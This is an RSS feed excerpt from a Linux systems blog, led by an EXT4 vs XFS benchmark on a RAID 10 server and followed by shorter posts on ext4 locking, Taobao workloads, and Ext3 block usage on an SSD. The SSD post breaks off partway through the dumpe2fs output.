		<title>EXT4 vs XFS: large volumes with low-end RAID controller</title>
		<link>http://www.enunix.com/1088.html</link>
		<comments>http://www.enunix.com/1088.html#comments</comments>
		<pubDate>Thu, 12 Jan 2012 11:10:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[FileSystem]]></category>
		<category><![CDATA[RAID]]></category>
		<category><![CDATA[ext3]]></category>
		<category><![CDATA[ext4]]></category>
		<category><![CDATA[xfs]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1088</guid>
		<description><![CDATA[Some months ago, I wrote an article comparing EXT3, EXT4, XFS and BTRFS filesystem performances with a Fedora 14 x86_64 installation done on a Dell Latitude D620 laptop. While the results were quite interesting (especially to evaluate BTRFS performance), they &#8230; <a href="http://www.enunix.com/1088.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<div id="main">
<div id="main-body">
<div id="main-content">
<p>Some months ago, I wrote an article comparing EXT3, EXT4, XFS and BTRFS filesystem performances with a Fedora 14 x86_64 installation done on a Dell Latitude D620 laptop. While the results were quite interesting (especially to evaluate BTRFS performance), they were collected on a consumer machine (a laptop), with consumer-grade processor and HDD. So, the results do not necessarily translate to server world in a linear manner – a very good filesystem for a single 2.5&#8221; HDD can be inadequate for a multi-disk server machine, and vice-versa.</p>
<p>Today, thank to the “Center for Research Computing” at University of Notre Dame, and especially to Paul Brenner, Serguei Fedorov and Rich Sudlow, I am able to present you some filesystem benchmark results collected on a quite powerful Dell R510 server, loaded with 12 x 2 TB SATA disk connected to a low-end, inexpensive PERC H200 controller. The article will focus on EXT4 vs XFS performance, as EXT3 can not grow bigger than 2 TB and BTRFS is way too young (and unproven) to be considered in the server world. I hope that these data can help you to chose the right filesystem for your workload.</p>
<p>While reading this article, please keep in mind that different usage patterns can favor different filesystems, so I don&#8217;t pretend to elect the always-better, stronger FS on the world. I simply want to give you some numbers collected in various usage patterns, so that I can help you in the choice of the right filesystem for some common jobs. Please also consider that FS performances can vary dramatically between kernel releases; however, this behavior should be mitigated by the fact that RHEL 6.0 use very conservative, security-focused kernel updates.</p>
<p><strong>Filesystems, mount options and others</strong></p>
<p>As you probably know, mount options can significantly impact filesystem speed, features and reliability. Moreover, the existence of filesystem-specific options mean that it is often quite hard to 100% match them across the various filesystems.</p>
<p>Fortunately, the vast majority of FS-specific options have very reasonable and reliability-focused predefined values, so we can generally use the defaults with no problem. However, If you want to do a significant comparison, one option should absolutely be the same between the different setups: the write barrier option.</p>
<p>Write barriers are a synchronization method that enable OS to safety flush the on-disk cache content to the physical disk platters. Without write barriers, a fsync() call will flush the main memory disk cache, but it will <em>not</em> flush the disk/controller cache. While disabling barrier can sometime speed up the filesystem/disks combo considerably, it can also lead to data loss, even when the OS assumes that all data were safety written to disk. For example, a power outage will cause the loss of any data in the disk cache that were not written to the disk platters.</p>
<p>However, there are circumstances when write barriers can be disabled without problems: think to a UPS-protected server with a battery backed disk cache, or simply to a controller/disk combo with no DRAM cache at all. In this case, any power outage will not imply a cache data loss, so barriers can be safety disabled.</p>
<p>The Dell R510 server system used for this benchmark round is equipped with a PERC H200 disk controller with no DRAM cache. Moreover this controller disable any disk level cache found on the attacked disks, so I disabled write barriers with the “nobarrier” mount option.</p>
<p>Please keep in mind that enabling write barriers can cause a different, FS-specific performance drop. For example, generally XFS incur into a greater drop than EXT4. So, while the relative standing should remain more-or-less similar, the following results should be considered valid only for installations with write barriers disabled.</p>
<p><strong>UPDATE 05/04/2011:</strong></p>
<p>For more informations about EXT4 and XFS history, mount options and other things, you can visit the following wikipedia pages:</p>
<ul>
<li>EXT4: <a href="http://en.wikipedia.org/wiki/Ext4">http://en.wikipedia.org/wiki/Ext4</a></li>
<li>XFS: <a href="http://en.wikipedia.org/wiki/Xfs">http://en.wikipedia.org/wiki/Xfs</a></li>
<li>Capabilities comparison: <a href="http://en.wikipedia.org/wiki/Comparison_of_file_systems">http://en.wikipedia.org/wiki/Comparison_of_file_systems</a></li>
</ul>
<p><strong>Testbed and methods</strong></p>
<p>The Dell R510 have the following hardware and software configuration:</p>
<ul>
<li>2x Intel Xeon E5620 with HT OFF (4 cores, 4 threads , 12 MB L3 cache) @ 2.4 GHz</li>
<li>8x 4 GB DDR3 RAM (32 GB total RAM)</li>
<li>PERC H200 RAID Controller</li>
<li>12x 2 TB 7.2K RPM SATA 3Gps disks</li>
<li>Red Hat Enterprise Linux 6.0 64 bit</li>
</ul>
<p>The 12 disks were assigned to 2 RAID array:</p>
<ul>
<li>a first, 2 disks RAID 1 array for OS installation</li>
<li>a second, 10 disks RAID 10 array for the benchmark runs</li>
</ul>
<p>To run the benchmarks, I used the following softwares:</p>
<ul>
<li>bonnie++-1.96-1.el6.rf.x86_64.rpm</li>
<li>sysbench-0.4.12-1.el6.x86_64.rpm</li>
<li><span class='bm_keywordlink'><a href="http://www.enunix.com/category/mysql">mysql</a></span>-server-5.1.52-1.el6_0.1.x86_64.rpm</li>
<li><span class='bm_keywordlink'><a href="http://www.enunix.com/category/mysql">mysql</a></span>-bench-5.1.52-1.el6_0.1.x86_64.rpm</li>
<li>postgresql-server-8.4.7-1.el6_0.1.x86_64.rpm</li>
<li>postgresql-test-8.4.7-1.el6_0.1.x86_64.rpm</li>
</ul>
<p>Please note that the benchmarked filesystems were optimized for the physical array layout (in this case, 5 active data disks and 64 KB stripe size). Remember that, as stated before, the PERC H200 controller does <em>not have any onboard cache, and it disable any disk-level cache</em> it found on the attached disks. For this reason, write barriers were disabled.</p>
<p>I run each benchmark at least 3 times and then reported the mean value.</p>
<p>A note on the CPU load number: as this Dell R512 has 8 physical cores that can manage 8 hardware threads (HyperThreading was set to OFF), the maximum CPU load percentage, as reported by the Linux kernel, is 800%. So, if when you read something similar to “100% CPU load”, this mean that, on average, only one core (from the 12 available) was fully utilized.</p>
<p><strong>UPDATE 05/06/2011:</strong> <em>hardware description was updated to correctly describe the core/threads configuration. I originally wrote that the CPUs were two hexa-cores ones, while they really are two quad-cores processors.</em></p>
<p><strong>UPDATE 05/10/2011</strong>:<em> a reader ask to me explicitly specify the mkfs and mount parameters. For filesystems creation, I use the following commands:</em></p>
<ul>
<li><em>EXT4: mkfs.ext4 /dev/sdb1 -E stride=16,stride-width=80</em></li>
<li><em>XFS: mkfs.xfs /dev/sdb1 -d su=64k,sw=5</em></li>
</ul>
<p><em>Both filesystems were mounted with default parameters and the &#8220;nobarrier&#8221; option.</em></p>
<p><strong>Filesystem creation and checking time</strong></p>
<p>The first test is related to filesystem creation and checking time. The following graph will show you the time needed to create and fsck the ~10 TB filesystem used to fill the RAID 10 array. The fsck command was run after the creation of a significant number of small file, obtained unpacking the linux-2.6.36.4.tar.bz2 file downloaded form kernel.org:</p>
<p><a href="http://www.enunix.com/1088.html/1fs_creation_checking" rel="attachment wp-att-1089"><img class="alignnone size-full wp-image-1089" title="1fs_creation_checking" src="http://www.enunix.com/wp-content/uploads/2012/01/1fs_creation_checking.png" alt="" /></a></p>
<p>As you can see, XFS was way faster then EXT4 in this large volume creation and checking. However, you should not overestimate these results: remember that you generally create the FS only one time, and the fsck operation should be a rare one (after all, both FS are journaled for this reason). On the other hand, if you plan to create/check very ofter a large filesystem, stay away from EXT4 and go with XFS.</p>
<p><strong>Bonnie++ results</strong></p>
<p>Sequential and random read/write speeds are two factors that can greatly influence final application speed. Let&#8217;s start examining Bonnie++ sequential speed and CPU usage:</p>
<p><a href="http://www.enunix.com/1088.html/2bonnie_seq" rel="attachment wp-att-1090"><img class="alignnone size-full wp-image-1090" title="2bonnie_seq" src="http://www.enunix.com/wp-content/uploads/2012/01/2bonnie_seq.png" alt="" width="607" height="380" /></a></p>
<p>While EXT4 and XFS generally show comparable results both in normal, cached mode and in synchronous mode, XFS lead the sequential output (write) test by a very large margin. To tell the truth, the EXT4 sequential output test results seem unrealistically low.</p>
<p>What about random speed? Bonnie++&#8217;s random I/O speed return the number of seeks per second that the disk subsystem can sustain:</p>
<p><a href="http://www.enunix.com/1088.html/3bonnie_seeks" rel="attachment wp-att-1091"><img class="alignnone size-full wp-image-1091" title="3bonnie_seeks" src="http://www.enunix.com/wp-content/uploads/2012/01/3bonnie_seeks.png" alt="" width="607" height="380" /></a></p>
<p>The mechanical nature of current hard disks implies results that are some order of magnitude lower than the sequential ones: considering 512 byte long sectors, we are speaking about a maximum I/O transfer rate of ~264 KB/s. Considering 4096 byte long sector, the I/O transfer rate grows to a maximum of ~2114 KB/s. In this test, we see that EXT4 has a slight advantage; however, in the synchronous mode the two contenders are tied.</p>
<p>Let&#8217;s now see file creation/deletion, aka metadata handling, performance. First, normal mode:</p>
<p><a href="http://www.enunix.com/1088.html/4bonnie_file" rel="attachment wp-att-1092"><img class="alignnone size-full wp-image-1092" title="4bonnie_file" src="http://www.enunix.com/wp-content/uploads/2012/01/4bonnie_file.png" alt="" width="607" height="380" /></a></p>
<p>EXT4 really eclipses XFS in this test, scoring some very high results. However, you can argue that the ~2500 new files/sec scored by XFS should be enough for any kind of workload.</p>
<p>Now, synchronous mode:</p>
<p><a href="http://www.enunix.com/1088.html/5bonnie_file_sinc" rel="attachment wp-att-1093"><img class="alignnone size-full wp-image-1093" title="5bonnie_file_sinc" src="http://www.enunix.com/wp-content/uploads/2012/01/5bonnie_file_sinc.png" alt="" width="607" height="380" /></a></p>
<p>This time, XFS was the best.</p>
<p>So, from Bonnie++ tests we noted that, while EXT4 excel in metadata handling, XFS seems to be faster transferring I/O block from the disk subsystem, and its synchronous behavior seems to be more robust than EXT4 one.</p>
<p>One last thing to note is that Bonnie++ sometime crashed the entire machine when running on top of EXT4 filesystem. The cause the crash is under investigation, but seems related to out of memory conditions. While Bonnie++ (in synchronous mode) was the only test that trigger the crash, the fact that it bring down the entire machine is a bad thing. XFS, on the other hand, never had this problem.</p>
<p><strong>Sysbench file benchmark</strong></p>
<p>Filesystem I/O performances are a difficult thing to profile. For this reason, I run another set of sequential and random I/O transfer benchmarks using the sysbench utility. Sequential speed tests were run with 2 MB big blocks, while random speed with 4 KB blocks.</p>
<p>Let&#8217;s start with sequential speed:</p>
<p><a href="http://www.enunix.com/1088.html/6sysbench_file_seq" rel="attachment wp-att-1094"><img class="alignnone size-full wp-image-1094" title="6sysbench_file_seq" src="http://www.enunix.com/wp-content/uploads/2012/01/6sysbench_file_seq.png" alt="" width="607" height="380" /></a></p>
<p>While in normal, cached mode the two filesystems are quite well matched each other, in the synchronous test we see some divergence: XFS is faster in sequential write, while EXT4 is faster in sequential read.</p>
<p>Please note that EXT4 sequential read is higher in synchronous mode than in the normal one: can this be related to a delayed allocation side effect? Remember that in normal mode, sysbench&#8217;s test issue one fsync() per 100 writes, while in synchronous mode it issue one fsync() for each write, effectively disabling the delayed allocator. My two cents are that if the read speed of the just-written files are greater in the latter mode, it can be that the delayed allocation feature something can lower performance.</p>
<p>Now, random speed:</p>
<p><a href="http://www.enunix.com/1088.html/7sysbench_file_rnd" rel="attachment wp-att-1095"><img class="alignnone size-full wp-image-1095" title="7sysbench_file_rnd" src="http://www.enunix.com/wp-content/uploads/2012/01/7sysbench_file_rnd.png" alt="" width="607" height="380" /></a></p>
<p>I&#8217;m not sure how to interpret XFS random read speed, as it seems to be higher that the theoretical maximum speed (considering a 4 ms rotational delay, 4 KB blocks and 5 active data disk we end with ~5000 KB max speed). Probably, when using XFS, this read benchmark is greatly influenced by OS caching and/or read-ahead setting. Write speed seems fine though, and we see that XFS is faster here, by quite a large margin. However, the absolute results are very low: this is, again, a consequence of the mechanical nature of current hard disks and the lack of any caching by the controller/disks combo.</p>
<p><strong>Untar and cat time</strong></p>
<p>It is very common in the Linux world to distribute some very large number of quite small files using a compressed, one-file archive created by using the tar and bzip/gzip utilities. For examples, Linux kernel (downloadable from kernel.org) are distributed in this specific manner.</p>
<p>So, an interesting benchmark would be to record the time needed to untar (extract) the Linux kernel .tar.bz2 file, and then to read-back the just-extracted files:</p>
<p><a href="http://www.enunix.com/1088.html/8untar_cat" rel="attachment wp-att-1096"><img class="alignnone size-full wp-image-1096" title="8untar_cat" src="http://www.enunix.com/wp-content/uploads/2012/01/8untar_cat.png" alt="" width="607" height="380" /></a></p>
<p>EXT4 is faster in the extraction process, especially considering the very low final sync time.</p>
<p>When considering cat (read) time, however, XFS is the best.</p>
<p>So, these first results show us that there is not a single, best-of-all filesystem. It all depend on the I/O request (read or write) and the workload type (sequential, random, cache, synchronous, etc).</p>
<p>UPDATE 05/04/2011: <em>I added the detailed <span class='bm_keywordlink'><a href="http://www.enunix.com/category/mysql">mysql</a></span>-bench results graph.</em></p>
<p><strong>MySQL benchmarks</strong></p>
<p>It&#8217;s now time for some database testing.</p>
<p>The first one is about creating and populating a MySQL database with 10 million rows, using sysbench oltp prepare benchmark. Who is the faster between XFS and EXT4?</p>
<p><a href="http://www.enunix.com/1088.html/9sysbench_mysql_prepare" rel="attachment wp-att-1097"><img class="alignnone size-full wp-image-1097" title="9sysbench_mysql_prepare" src="http://www.enunix.com/wp-content/uploads/2012/01/9sysbench_mysql_prepare.png" alt="" width="607" height="380" /></a></p>
<p>It seems that XFS wins by a small margin.</p>
<p>What happen when we start to query the db?</p>
<p><a href="http://www.enunix.com/1088.html/10sysbench_mysql_simple-2" rel="attachment wp-att-1099"><img class="alignnone size-full wp-image-1099" title="10sysbench_mysql_simple" src="http://www.enunix.com/wp-content/uploads/2012/01/10sysbench_mysql_simple1.png" alt="" width="607" height="380" /></a></p>
<p>In this simple, read-only test we have a tie.</p>
<p>Now, the complex, read-write, transactional test:</p>
<p><a href="http://www.enunix.com/1088.html/11sysbench_mysql_complex" rel="attachment wp-att-1100"><img class="alignnone size-full wp-image-1100" title="11sysbench_mysql_complex" src="http://www.enunix.com/wp-content/uploads/2012/01/11sysbench_mysql_complex.png" alt="" width="607" height="380" /></a></p>
<p>We have another virtual tie here.</p>
<p>Last but not least, we have the <span class='bm_keywordlink'><a href="http://www.enunix.com/category/mysql">mysql</a></span>-bench benchmark scores:</p>
<p><a href="http://www.enunix.com/1088.html/12mysql_bench" rel="attachment wp-att-1101"><img class="alignnone size-full wp-image-1101" title="12mysql_bench" src="http://www.enunix.com/wp-content/uploads/2012/01/12mysql_bench.png" alt="" width="607" height="380" /></a></p>
<p>Please note that this benchmark tests various aspects of a MySQL database, and some of them are not directly influenced by I/O speed. So, the XFS&#8217;s win is a quite remarkable one.</p>
<p>At the end, have a look at detailed <span class='bm_keywordlink'><a href="http://www.enunix.com/category/mysql">mysql</a></span>-bench report:</p>
<p><a href="http://www.enunix.com/1088.html/13mysql_bench_detail" rel="attachment wp-att-1103"><img class="alignnone size-full wp-image-1103" title="13mysql_bench_detail" src="http://www.enunix.com/wp-content/uploads/2012/01/13mysql_bench_detail.png" alt="" width="607" height="380" /></a></p>
<p>&nbsp;</p>
<p>So, summarizing MySQL results, we can conclude that while XFS is slight faster then EXT4, you can not go wrong with any of these two filesystems.</p>
<p><strong>PostgreSQL benchmarks:</strong></p>
<p>&nbsp;</p>
<p>Another popular, open source database server is PostgreSQL. Which filesystem is the fastest here?</p>
<p>The first test is about creating and populating a PostgreSQL database with 100 thousand rows, using sysbench oltp prepare test:</p>
<p><a style="color: #ff4b33; line-height: 24px;" href="http://www.enunix.com/1088.html/14sysbench_psql_prepare" rel="attachment wp-att-1102"><img class="alignnone size-full wp-image-1102" style="border-style: initial; border-color: initial;" title="14sysbench_psql_prepare" src="http://www.enunix.com/wp-content/uploads/2012/01/14sysbench_psql_prepare.png" alt="" width="607" height="380" /></a></p>
<p>We have a great EXT4 victory here, with a prepare time way lower then the XFS one.</p>
<p>Now, let&#8217;s start to query the db with the simple, read-only sysbench oltp benchmark:</p>
<p><a href="http://www.enunix.com/1088.html/15sysbench_psql_simple" rel="attachment wp-att-1105"><img class="alignnone size-full wp-image-1105" title="15sysbench_psql_simple" src="http://www.enunix.com/wp-content/uploads/2012/01/15sysbench_psql_simple.png" alt="" width="607" height="380" /></a></p>
<p>In this read-only test, XFS is no slower than EXT4.</p>
<p>What happen in the complex, read-write, transactional benchmark?</p>
<p><a href="http://www.enunix.com/1088.html/16sysbench_psql_complex" rel="attachment wp-att-1106"><img class="alignnone size-full wp-image-1106" title="16sysbench_psql_complex" src="http://www.enunix.com/wp-content/uploads/2012/01/16sysbench_psql_complex.png" alt="" width="607" height="380" /></a></p>
<p>EXT4 is again much faster then XFS.</p>
<p>From these tests it seems that when dealing with writes, EXT4 is faster then XFS in PostgreSQL&#8217;s workload type.</p>
<p>Finally, I run the pgbench benchmark, with scale and requests per client both set to 1000. First, the prepare time:</p>
<p><a href="http://www.enunix.com/1088.html/17pgbench_prepare" rel="attachment wp-att-1110"><img class="alignnone size-full wp-image-1110" title="17pgbench_prepare" src="http://www.enunix.com/wp-content/uploads/2012/01/17pgbench_prepare.png" alt="" width="607" height="380" /></a></p>
<p>This time, XFS shows the same performance then EXT4.</p>
<p>Now, the real benchmark run:</p>
<p><a href="http://www.enunix.com/1088.html/18pgbench_tps" rel="attachment wp-att-1107"><img class="alignnone size-full wp-image-1107" title="18pgbench_tps" src="http://www.enunix.com/wp-content/uploads/2012/01/18pgbench_tps.png" alt="" width="607" height="380" /></a></p>
<p>EXT4 is again over 2X faster then XFS.</p>
<p>So, in the end, if you plan to use PostgreSQL, go with EXT4 filesystem (especially if you plan to execute a large number of INSERT / UPDATE / TRANSACTION statements).</p>
<p><strong>Fragmentation</strong></p>
<p>Fragmentation is the #1 enemy of mechanical disks, as every head movement correspond to lower total I/O performance.</p>
<p>Both EXT4 and XFS has a fame to be very fragmentation resistant, but what is the best? Let&#8217;s start with counting fragments per file after the extraction of the Linux kernel .tar.bz2 file (see the untar test above for more informations):</p>
<p><a href="http://www.enunix.com/1088.html/19untar_frag" rel="attachment wp-att-1108"><img class="alignnone size-full wp-image-1108" title="19untar_frag" src="http://www.enunix.com/wp-content/uploads/2012/01/19untar_frag.png" alt="" width="607" height="380" /></a></p>
<p>Yeah, both filesystems where exceptionally resistant to fragmentation here, showing perfect results.</p>
<p>Sysbench&#8217;s sequential and random tests give us another interesting point of reference in this discipline. First, the fragmentation status after the sequential write test:</p>
<p><a href="http://www.enunix.com/1088.html/20sysbench_seqwr_frag" rel="attachment wp-att-1109"><img class="alignnone size-full wp-image-1109" title="20sysbench_seqwr_frag" src="http://www.enunix.com/wp-content/uploads/2012/01/20sysbench_seqwr_frag.png" alt="" width="607" height="380" /></a></p>
<p>Now XFS is the leader, with EXT4 lagging quite behind. It is interesting to note that in the synchronous test (one write / one fsync) EXT4 exhibits lower fragmentation: this can explain the higher sequential read results in synchronous mode recorded earlier. Speaking about XFS, it seems that this filesystem optimally manage large files and its high sequential read/write speeds are likely a results of the complete lack of fragmentation in these class of files.</p>
<p>The random write test is a harder one:</p>
<p><a href="http://www.enunix.com/1088.html/21sysbench_rndwr_frag" rel="attachment wp-att-1104"><img class="alignnone size-full wp-image-1104" title="21sysbench_rndwr_frag" src="http://www.enunix.com/wp-content/uploads/2012/01/21sysbench_rndwr_frag.png" alt="" width="607" height="380" /></a></p>
<p>In this case, both filesystems become heavily fragmented, proving that no filesystem is completely immune to this issue. However, XFS has and edge here: it ships with a functional, proved defragmenter, while the EXT4 package lack an official, stable-released defrag utility (while this utility exists, it is more-or-less in a beta stage).</p>
<p><strong>Conclusions</strong></p>
<p>Well, if you arrived here, congratulation: you had the patience to analyze about 20 graphs!</p>
<p>So, in the end, which filesystem should you choose for your server, EXT4 or XFS? As stated above, it all depends on the expected workload type. Below are my recommendations:</p>
<ul>
<li><strong>workstation machine:</strong> you can not go wrong with any of these two filesystems. While EXT4 is better at files creation and deletion (a common job on any machine), XFS re-balance the choice thank to higher speed with large files and near-perfect fragmentation resistance</li>
<li><strong>development machine: </strong>if you plan to often create / delete / check any large volume, absolutely go with XFS</li>
<li><strong>web server (apache + <span class='bm_keywordlink'><a href="http://www.enunix.com/category/mysql">mysql</a></span>): </strong>although EXT4 is competitive, XFS&#8217;s higher MySQL and large files performances give it the edge here</li>
<li><strong>file server: </strong>if you plan to store and actively use some large files, go with XFS; in the other case (small files) go with EXT4</li>
<li><strong>MySQL database server: </strong>I slightly prefer XFS for this kind of workload</li>
<li><strong>PostgreSQL server: </strong>definitely go with EXT4</li>
<li><strong>virtualization (consolidation) server: </strong>while virtual machine consolidation is a very complex topic and a definitive answer will require extensive testing, I think that XFS should be the better choice as it has great large files performance and excellent fragmentation behavior (also don&#8217;t forget its on-line defrag utility)</li>
</ul>
<p><strong>UPDATE 05/04/2011:</strong> <em>Paul ask me to better explain the different filesystem choice for the two different database systems benchmarked (MySQL and PostgreSQL). The point is that, while both MySQL and PostgreSQL are very common opensource database, their implementations (and, in a certain extent, their purposes) are very different. For example, MySQL has optimization aimed at converting (or delaying) some random I/O operations in sequential ones. With these optimizations, MySQL can coalesce some random I/O operations in only one sequential read/write. PostgreSQL, instead, use different optimizations and generally tend to not delay random I/O writes. So, it is not surprising that EXT4 and XFS have quite different behaviors with these two different database server.</em></p>
<p>Remember that the above benchmark were collected with write barriers disabled! If you had to enable them to guarantee data integrity, the absolute results can be quite different (but the relative standing should remain more-or-less similar).</p>
</div>
</div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1088.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>alloc_sem of Ext4 block group</title>
		<link>http://www.enunix.com/1085.html</link>
		<comments>http://www.enunix.com/1085.html#comments</comments>
		<pubDate>Tue, 10 Jan 2012 03:26:11 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[FileSystem]]></category>
		<category><![CDATA[ext4]]></category>
		<category><![CDATA[file]]></category>
		<category><![CDATA[System]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1085</guid>
		<description><![CDATA[Yesterday Amir Goldstein sent me an email for a deadlock issue. I was in Chinese New Year vacation, could not have time to check the code (also I know I can not answer his question with ease). Thanks to Ted, &#8230; <a href="http://www.enunix.com/1085.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<div>
<p>Yesterday Amir Goldstein sent me an <span class='bm_keywordlink'><a href="http://www.enunix.com/category/email">email</a></span> for a deadlock issue. I was in Chinese New Year vacation, could not have time to check the code (also I know I can not answer his question with ease). Thanks to Ted, he provides a quite clear answer. I feel Ted’s answer is also very informative to me, I copy&amp;past the conversation from linux-ext4@vger.kernel.org to my blog. The copy rights of the bellowed referenced text belong to their original authors.</p>
<blockquote><p>On Sun, Feb 06, 2011 at 10:43:58AM +0200, Amir Goldstein wrote:<br />
&gt; When looking at alloc_sem, I realized that it is only needed to avoid<br />
&gt; race with adjacent group buddy initialization.<br />
Actually, alloc_sem is used to protect all of the block group specific<br />
data structures; the buddy bitmap counters, adjusting the buddy bitmap<br />
itself, the largest free order in a block group, etc.  So even in the<br />
case where block_size == page_size, alloc_sem is still needed!<br />
- Ted</p></blockquote>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1085.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Three Practical System Workloads of Taobao</title>
		<link>http://www.enunix.com/1083.html</link>
		<comments>http://www.enunix.com/1083.html#comments</comments>
		<pubDate>Tue, 10 Jan 2012 03:25:33 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[System]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1083</guid>
		<description><![CDATA[Days ago, I gave a talk on an academic seminar at ACT of Beihang University (http://act.buaa.edu.cn/). In my talk, I introduced three typical system workloads we (a group of system software developers inside Taobao) observed from the most heavily used/deployed &#8230; <a href="http://www.enunix.com/1083.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>Days ago, I gave a talk on an academic seminar at ACT of Beihang University (http://act.buaa.edu.cn/). In my talk, I introduced three typical system workloads we (a group of system software developers inside Taobao) observed from the most heavily used/deployed product lines. The introduction was quite brief, no detail touched here. we don’t mind to share what we did imperfectly, and we would like to open mind to cooperate with open source community and industries to improve <img src="http://blog.coly.li/wp-includes/images/smilies/icon_smile.gif" alt=":-)" /></p>
<p>If you find there is anything unclear or misleading, please let me know. Communication makes things better most of time <img src="http://blog.coly.li/wp-includes/images/smilies/icon_smile.gif" alt=":-)" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.enunix.com/1083.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Don’t waste your SSD blocks</title>
		<link>http://www.enunix.com/1081.html</link>
		<comments>http://www.enunix.com/1081.html#comments</comments>
		<pubDate>Tue, 10 Jan 2012 03:25:02 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[SSD]]></category>
		<category><![CDATA[disk]]></category>

		<guid isPermaLink="false">http://www.enunix.com/?p=1081</guid>
		<description><![CDATA[These days, one of my colleagues asked me a question, he formatted an ~80G Ext3 file system on SSD. After mounted the file system, the df output was, Filesystem 1K-blocks Used Available Use% Mounted on /dev/sdb1 77418272 184216 73301344 1 &#8230; <a href="http://www.enunix.com/1081.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<div>
<p>These days, one of my colleagues asked me a question, he formatted an ~80G Ext3 file system on SSD. After mounted the file system, the df output was,</p>
<table border="0" frame="void" rules="none" cellspacing="0">
<colgroup span="1">
<col span="1" width="90" />
<col span="1" width="90" />
<col span="1" width="69" />
<col span="1" width="65" />
<col span="1" width="89" />
<col span="1" width="104" /></colgroup>
<tbody>
<tr>
<td align="right" width="90" height="17">Filesystem</td>
<td align="right" width="90">1K-blocks</td>
<td align="right" width="69">Used</td>
<td align="right" width="65">Available</td>
<td align="right" width="89">Use%</td>
<td align="right" width="104">Mounted on</td>
</tr>
<tr>
<td align="right" height="17">/dev/sdb1</td>
<td align="right">77418272</td>
<td align="right">184216</td>
<td align="right">73301344</td>
<td align="right">1</td>
<td align="right">/mnt</td>
</tr>
</tbody>
</table>
<p>As well as from fdisk output, it said,</p>
<table border="0" frame="void" rules="none" cellspacing="0">
<colgroup span="1">
<col span="1" width="90" />
<col span="1" width="90" />
<col span="1" width="69" />
<col span="1" width="65" />
<col span="1" width="89" />
<col span="1" width="104" />
<col span="1" width="81" /></colgroup>
<tbody>
<tr>
<td align="right" width="90" height="17">Device</td>
<td align="right" width="90">Boot</td>
<td align="right" width="69">Start</td>
<td align="right" width="65">End</td>
<td align="right" width="89">Blocks</td>
<td align="right" width="104">Id</td>
<td align="right" width="81">System</td>
</tr>
<tr>
<td align="right" height="17">/dev/sdb1</td>
<td align="right"></td>
<td align="right">7834</td>
<td align="right">17625</td>
<td align="right">78654240</td>
<td align="right">83</td>
<td align="right">Linux</td>
</tr>
</tbody>
</table>
<p>From his observation, before format the SSD, there was 78654240 1k blocks available on the partition, after the format, 77418272 1k blocks could be used, which means almost 1G space unused from the partition.</p>
<p>A more serious question was, from the output of df, used blocks + available blocks = 73485560, but the file system had 77418272 blocks — 4301144 1k blocks disappeared ! This 160G SSD costs him 430USD, he complained around 15USD was payed for nothing.</p>
<p>IMHO, this is a quite interesting question, and asked by many people for many times. This time, I’d like to spend some time to explain how the blocks are wasted, and how to make better usage of every block on the SSD (since it’s quite expensive).</p>
<p>First of all, better storage usage depends on the I/O pattern in practice. This SSD is used to store large file for random I/O, especially most of the I/O (99%+) is reading on random file offset, the writing can almost be ignored. Therefore, it is wanted to use every available block to store a very big files on the Ext3 file systems.</p>
<p>If only using the default command line to format an Ext3 file system like “mkfs.ext3 /dev/sdb1″, mkfs.ext3 will do the following things for block allocation,</p>
<p>- Allocates reserved blocks for root user, to avoid non-privilege users using up all disk space.</p>
<p>- Allocates metadata like superblock, backed superblock, block group descriptors, block bitmap for each block group, inode bitmap for each block group, inode table for each block group.</p>
<p>- Allocates reserved block group blocks for offline file system extension.</p>
<p>- Allocates blocks for journal</p>
<p>Since the SSD is only for data storage, no operation system installed on it, and writing performance is disregarded here, and no requirement for further file system size extension, and only a few files are stored on the file systems, some blocks allocation is unnecessary and useless,</p>
<p>- Journal blocks</p>
<p>- Inodes blocks</p>
<p>- Reserved group descriptor blocks for file system resize</p>
<p>- Reserved blocks for root user</p>
<p>Let’s run dumpe2fs to see how many blocks are wasted on the above items, I only list part of the output (outlines) here,</p>
<blockquote><p>&gt; dumpe2fs /dev/sdb1</p></blockquote>
<blockquote><p>Filesystem volume name:   &lt;none&gt;<br />
Last mounted on:          &lt;not available&gt;<br />
Filesystem UUID:          f335ba18-70cc-43f9-bdc8-ed0a8a1a5ad3<br />
Filesystem magic number:  0xEF53<br />
Filesystem revision #:    1 (dynamic)<br />
Filesystem features:      has_journal ext_attr <strong>resize_inode</strong> dir_index filetype needs_recovery sparse_super large_file<br />
Filesystem flags:         signed_directory_hash<br />
Default mount options:    (none)<br />
Filesystem state:         clean<br />
Errors behavior:          Continue<br />
Filesystem OS type:       Linux<br />
Inode count:              4923392<br />
Block count:              19663560<br />
<strong>Reserved block count:     983178</strong><br />
Free blocks:              19308514<br />
Free inodes:              4923381<br />
First block:              0<br />
Block size:               4096<br />
Fragment size:            4096<br />
<strong>Reserved GDT blocks:      1019</strong><br />
Blocks per group:         32768<br />
Fragments per group:      32768<br />
<strong>Inodes per group:         8192<br />
Inode blocks per group:   512</strong><br />
Filesystem created:       Tue Jul  6 21:42:32 2010<br />
Last mount time:          Tue Jul  6 21:44:42 2010<br />
Last write time:          Tue Jul  6 21:44:42 2010<br />
Mount count:              1<br />
Maximum mount count:      39<br />
Last checked:             Tue Jul  6 21:42:32 2010<br />
Check interval:           15552000 (6 months)<br />
Next check after:         Sun Jan  2 21:42:32 2011<br />
